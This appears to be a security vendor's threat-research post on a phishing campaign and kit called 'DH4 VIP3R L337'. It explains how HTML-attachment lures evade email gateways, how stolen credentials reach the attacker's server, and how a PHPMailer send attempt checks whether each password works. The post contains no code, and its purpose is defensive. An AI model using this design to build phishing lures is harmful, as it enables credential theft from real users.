Executive Summary
It all started when a colleague at Menlo Labs stumbled upon an open directory with usernames and passwords. Looking at the contents of the web server, we identified that this was the result of a single campaign. This campaign was fairly successful and was able to compromise credentials of 164 users at various companies. The threat activity outlined in this post is deemed a Highly Evasive Adaptive Threat (HEAT), which can easily bypass current, traditional security measures.
In the process of analyzing this kit, we came across a unique string “DH4 VIP3R L337.” This started our quest to understand more about this specific kit and actor.
The questions we sought to answer were:
- How many campaigns has this actor launched?
- Were they after a specific set of targets? Or was it a widespread effort to gather credentials?
- Who is behind this phishing kit?
- What are the TTPs?
Verticals successfully compromised
Technical Analysis
The modus operandi of the bad actors is to send an HTML attachment via email to their potential victims. While most secure email gateways (SEGs) have default blocks for certain file types, HTML attachments are exempt from this level of defense. This is because many large financial firms send encrypted emails that require users to first register and create an account to securely view the message. These encrypted emails are usually in the form of HTML attachments.
The following screenshot (Figure 1) is an example of what gets displayed to the user when they open the malicious HTML attachment.
Our research reveals that attackers seem to be carefully selecting and customizing their lures based on services used by the target company. In total we identified 147 unique lures used by the attackers. The lures ranged from cybersecurity companies to financial services and everything in between.
The submitted user credentials are sent to the attacker’s CnC using an ajax XHR request. Thanks to JCyberSec, who sent us the server side code, we were able to reconstruct the entire attack chain and detail the capabilities of the campaign. The attacker has a unique way of validating the credentials submitted by the victim.
The flow of the attack is as follows:
- Attackers send customized HTML attachment payloads to the victim(s).
- Once the victim(s) open the attachment, they are presented with a phishing page impersonating a service that they use.
- Once the victim hits the Submit button, validation and verification of the password happens on the server side and a response is sent accordingly.
- The validation and verification process is done by using the PHPMailer library and sending an email with the victim’s username and password to the attacker-controlled email address.
- If the email fails, which means the verification of the password fails, a json response {“msg”:”errorsend”} is sent back to the client (browser). The client is then redirected to the legitimate website of the lure. For example, in the lure presented in Figure 1, the victim would be redirected to proofpoint.com.
- If the email is successfully sent, then the password has been verified and the client is redirected to a PDF hosted on Microsoft OneDrive.
We believe that the initial HTML attachments are created using a kit to automatically generate these HTML payloads. Menlo Labs researchers spent a significant amount of time looking for the kit, but were ultimately unable to locate it. If there are any researchers who are aware of such a kit, we would love to collaborate with them to understand how these payload generation kits function. However, until we have additional details, we are tracking this payload generation kit as VIP3R_L33T Generator.
Attacker Infrastructure Analysis
Most of the domains to which credentials were sent were registered using the NameCheap domain registration service. The service is both cheap and private for the domain registrant, which in essence hides details about who registered the domain.
The following are monikers that were used by the attackers:
- DH4 VIP3R L33T
- B4d BOI L33T
- ICQ Silentc0der
- *B0y
Conclusion
Credential phishing continues to be the number one attack that we see across customers. We’ve seen every single customer across geographies and industry verticals affected by this vector. Roughly 22 percent of attacks that we see across our platform are credential phishing attacks, with 7 percent of those attacks not being detected by legacy URL reputation engines. These legacy URL reputation evasion techniques, dubbed LURE by the Menlo Labs research team, are one of the four evasive techniques found in Highly Evasive Adaptive Threats (HEAT). The Menlo Labs team has observed a massive uptick in HEAT attacks, which take advantage of our inherent cognitive biases and fool us into entering our credentials. That bias, combined with the tactics used by attackers, make these attacks very successful. Increasing cybersecurity awareness through training and education initiatives is often helpful in reducing the impact of credential phishing attacks, but corporate users should always be cautious when a site presents a form that asks for personal or sensitive information.